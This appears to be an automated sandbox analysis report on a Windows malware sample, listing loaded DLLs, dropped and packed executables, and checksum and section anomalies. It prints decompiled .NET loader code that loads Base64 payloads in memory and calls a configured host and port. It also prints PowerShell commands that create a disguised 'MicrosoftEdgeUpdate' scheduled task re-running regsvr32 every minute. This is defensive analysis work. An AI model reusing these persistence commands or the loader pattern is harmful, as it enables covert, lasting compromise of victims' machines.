Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: aclayers.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc_os.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: slc.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: avicap32.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: msvfw32.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: winmm.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: version.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: vaultcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll

Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Gmail.lnk.53.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.53.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.53.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Google Drive.lnk.53.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.53.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.53.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp

Window found: window name: TMainForm

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\regsvr32.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ratty Jellyfish_is1

Source: SQ1NgqeTQy.exe

Static file information: File size 1859584 > 1048576

Source: SQ1NgqeTQy.exe

Static PE information: Raw size of payugmud is bigger than: 0x100000 < 0x199400

Source:

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	Unpacked PE file: 3.2.VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe.e60000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dxkyhxuw:EW;bdeytton:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;dxkyhxuw:EW;bdeytton:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Unpacked PE file: 4.2.78K21CNZITPIMAK88B8Q.exe.590000.0.unpack :EW;.rsrc:W;.idata :W;rihpxjyu:EW;fruizeat:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;rihpxjyu:EW;fruizeat:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 5.2.skotes.exe.c20000.0.unpack :EW;.rsrc:W;.idata :W;rihpxjyu:EW;fruizeat:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;rihpxjyu:EW;fruizeat:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 6.2.skotes.exe.c20000.0.unpack :EW;.rsrc:W;.idata :W;rihpxjyu:EW;fruizeat:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;rihpxjyu:EW;fruizeat:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 8.2.skotes.exe.c20000.0.unpack :EW;.rsrc:W;.idata :W;rihpxjyu:EW;fruizeat:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;rihpxjyu:EW;fruizeat:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Unpacked PE file: 23.2.f35b37b5a5.exe.ba0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jxlmjtji:EW;pjewfnhk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jxlmjtji:EW;pjewfnhk:EW;.taggant:EW;

.NET source code contains method to dynamically call methods (often used by packers)

Source: 29.2.regsvr32.exe.8a0000.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 29.2.regsvr32.exe.8a0000.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 29.2.regsvr32.exe.66ca5e.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 29.2.regsvr32.exe.66ca5e.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 29.2.regsvr32.exe.20e131e.2.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 29.2.regsvr32.exe.20e131e.2.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: 29.2.regsvr32.exe.8a0000.1.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 29.2.regsvr32.exe.8a0000.1.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 29.2.regsvr32.exe.8a0000.1.raw.unpack, Messages.cs	.Net Code: Memory
Source: 29.2.regsvr32.exe.66ca5e.0.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 29.2.regsvr32.exe.66ca5e.0.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 29.2.regsvr32.exe.66ca5e.0.raw.unpack, Messages.cs	.Net Code: Memory
Source: 29.2.regsvr32.exe.20e131e.2.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 29.2.regsvr32.exe.20e131e.2.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 29.2.regsvr32.exe.20e131e.2.raw.unpack, Messages.cs	.Net Code: Memory

Suspicious powershell command line found

Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{934473F6-3DB5-419B-8D3A-27C77AD9ADC5}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{934473F6-3DB5-419B-8D3A-27C77AD9ADC5}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }"

Source: random[2].exe.8.dr

Static PE information: 0xB9EE827D [Tue Nov 6 08:25:33 2068 UTC]

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: random[1].exe.8.dr	Static PE information: real checksum: 0xfd7f5 should be: 0xfdb14
Source: random[1].exe2.8.dr	Static PE information: real checksum: 0xdfde2 should be: 0xd54e7
Source: f35b37b5a5.exe.8.dr	Static PE information: real checksum: 0x1da53e should be: 0x1d2bf2
Source: 21a4f8ff7d.tmp.24.dr	Static PE information: real checksum: 0x0 should be: 0x122532
Source: random[1].exe0.8.dr	Static PE information: real checksum: 0x1da53e should be: 0x1d2bf2
Source: 78K21CNZITPIMAK88B8Q.exe.0.dr	Static PE information: real checksum: 0x2e292c should be: 0x2e375d
Source: _isdecmp.dll.25.dr	Static PE information: real checksum: 0x0 should be: 0x5528
Source: skotes.exe.4.dr	Static PE information: real checksum: 0x2e292c should be: 0x2e375d
Source: _isdecmp.dll.27.dr	Static PE information: real checksum: 0x0 should be: 0x5528
Source: is-KKQ75.tmp.27.dr	Static PE information: real checksum: 0x319701 should be: 0x30ff91
Source: ca3f738a4c.exe.8.dr	Static PE information: real checksum: 0xfd7f5 should be: 0xfdb14
Source: 21a4f8ff7d.tmp.26.dr	Static PE information: real checksum: 0x0 should be: 0x122532
Source: VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe.0.dr	Static PE information: real checksum: 0x1c6fe0 should be: 0x1bf6c7
Source: _setup64.tmp.27.dr	Static PE information: real checksum: 0x0 should be: 0x8546
Source: random[1].exe1.8.dr	Static PE information: real checksum: 0x0 should be: 0x16fc42
Source: 21a4f8ff7d.exe.8.dr	Static PE information: real checksum: 0x0 should be: 0x16fc42
Source: 94cd0458cc.exe.8.dr	Static PE information: real checksum: 0xdfde2 should be: 0xd54e7
Source: SQ1NgqeTQy.exe	Static PE information: real checksum: 0x1d5ea4 should be: 0x1c9fd7
Source: is-SSA0P.tmp.27.dr	Static PE information: real checksum: 0x0 should be: 0x1308eb
Source: random[2].exe.8.dr	Static PE information: real checksum: 0x0 should be: 0x7a5053
Source: 52d42007e3.exe.8.dr	Static PE information: real checksum: 0x0 should be: 0x7a5053
Source: _setup64.tmp.25.dr	Static PE information: real checksum: 0x0 should be: 0x8546

Source: SQ1NgqeTQy.exe	Static PE information: section name:
Source: SQ1NgqeTQy.exe	Static PE information: section name: .idata
Source: SQ1NgqeTQy.exe	Static PE information: section name:
Source: SQ1NgqeTQy.exe	Static PE information: section name: payugmud
Source: SQ1NgqeTQy.exe	Static PE information: section name: iicppffu
Source: SQ1NgqeTQy.exe	Static PE information: section name: .taggant
Source: VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe.0.dr	Static PE information: section name:
Source: VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe.0.dr	Static PE information: section name: .idata
Source: VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe.0.dr	Static PE information: section name:
Source: VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe.0.dr	Static PE information: section name: dxkyhxuw
Source: VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe.0.dr	Static PE information: section name: bdeytton
Source: VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe.0.dr	Static PE information: section name: .taggant
Source: 78K21CNZITPIMAK88B8Q.exe.0.dr	Static PE information: section name:
Source: 78K21CNZITPIMAK88B8Q.exe.0.dr	Static PE information: section name: .idata
Source: 78K21CNZITPIMAK88B8Q.exe.0.dr	Static PE information: section name: rihpxjyu
Source: 78K21CNZITPIMAK88B8Q.exe.0.dr	Static PE information: section name: fruizeat
Source: 78K21CNZITPIMAK88B8Q.exe.0.dr	Static PE information: section name: .taggant
Source: skotes.exe.4.dr	Static PE information: section name:
Source: skotes.exe.4.dr	Static PE information: section name: .idata
Source: skotes.exe.4.dr	Static PE information: section name: rihpxjyu
Source: skotes.exe.4.dr	Static PE information: section name: fruizeat
Source: skotes.exe.4.dr	Static PE information: section name: .taggant
Source: random[1].exe0.8.dr	Static PE information: section name:
Source: random[1].exe0.8.dr	Static PE information: section name: .idata
Source: random[1].exe0.8.dr	Static PE information: section name:
Source: random[1].exe0.8.dr	Static PE information: section name: jxlmjtji
Source: random[1].exe0.8.dr	Static PE information: section name: pjewfnhk
Source: random[1].exe0.8.dr	Static PE information: section name: .taggant
Source: f35b37b5a5.exe.8.dr	Static PE information: section name:
Source: f35b37b5a5.exe.8.dr	Static PE information: section name: .idata
Source: f35b37b5a5.exe.8.dr	Static PE information: section name:
Source: f35b37b5a5.exe.8.dr	Static PE information: section name: jxlmjtji
Source: f35b37b5a5.exe.8.dr	Static PE information: section name: pjewfnhk
Source: f35b37b5a5.exe.8.dr	Static PE information: section name: .taggant
Source: is-KKQ75.tmp.27.dr	Static PE information: section name: .xdata
Source: is-KKQ75.tmp.27.dr	Static PE information: section name: /4
Source: is-KKQ75.tmp.27.dr	Static PE information: section name: /19
Source: is-KKQ75.tmp.27.dr	Static PE information: section name: /35
Source: is-KKQ75.tmp.27.dr	Static PE information: section name: /47
Source: is-KKQ75.tmp.27.dr	Static PE information: section name: /61
Source: is-KKQ75.tmp.27.dr	Static PE information: section name: /73
Source: is-KKQ75.tmp.27.dr	Static PE information: section name: /86
Source: is-KKQ75.tmp.27.dr	Static PE information: section name: /97
Source: is-KKQ75.tmp.27.dr	Static PE information: section name: /113
Source: is-KKQ75.tmp.27.dr	Static PE information: section name: /127
Source: is-KKQ75.tmp.27.dr	Static PE information: section name: /143
Source: is-KKQ75.tmp.27.dr	Static PE information: section name: /159
Source: dllhost.exe.29.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Code function: 0_3_00FF1A41 push eax; ret	0_3_00FF1A42
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Code function: 0_3_00FF1A41 push eax; ret	0_3_00FF1A42
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Code function: 0_3_00FF1A41 push eax; ret	0_3_00FF1A42
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Code function: 0_3_00FF1A41 push eax; ret	0_3_00FF1A42
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Code function: 0_3_00FF1A41 push eax; ret	0_3_00FF1A42
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Code function: 0_3_00FF1A41 push eax; ret	0_3_00FF1A42
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Code function: 0_3_00FF1A41 push eax; ret	0_3_00FF1A42
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Code function: 0_3_00FF1A41 push eax; ret	0_3_00FF1A42
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Code function: 0_3_00FF1A41 push eax; ret	0_3_00FF1A42
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Code function: 0_3_00FF1A41 push eax; ret	0_3_00FF1A42
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Code function: 0_3_00FF1A41 push eax; ret	0_3_00FF1A42
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Code function: 0_3_00FF1A41 push eax; ret	0_3_00FF1A42
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Code function: 0_3_00FF1A41 push eax; ret	0_3_00FF1A42
